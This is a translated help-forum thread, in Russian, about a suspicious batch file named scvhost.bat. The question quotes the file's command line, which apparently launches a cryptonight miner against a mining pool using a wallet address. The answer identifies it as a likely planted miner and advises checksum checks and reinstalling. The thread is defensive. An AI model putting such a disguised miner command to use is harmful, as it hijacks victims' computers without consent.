17

Я только что нашел этот .bat файл с именем scvhost.bat. Файл содержал это содержание:

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

Это вирус (для кражи информации и т.д.) Или засеянный майнер? Я волнуюсь, поскольку я также балуюсь криптовалютами, а stratum - это валюта, которая упоминается в приведенном выше файле.

1 ответ1

34

Похоже, это какой-то майнер, тем более что параметр содержит URL-адрес пула майнинга. Тем не менее, вы должны быть уверены, что в двоичном файле. Имеет смысл сравнить контрольные суммы найденного вами бинарного файла вашей системы с выпусками, сделанными командой разработчиков майнера. Если они отличаются; считаю вашу систему небезопасной.

Другая проблема заключается в том, что вы узнали об этом майнере (возможно, потому, что он использовал много процессора), но вы не представляете, что еще произошло в вашей системе. Если злоумышленник может запустить майнер, он мог бы запустить и другие вещи. Это может быть хорошей идеей для восстановления из резервной копии или в любом случае выполнить новую установку.

Всё ещё ищете ответ? Посмотрите другие вопросы с метками .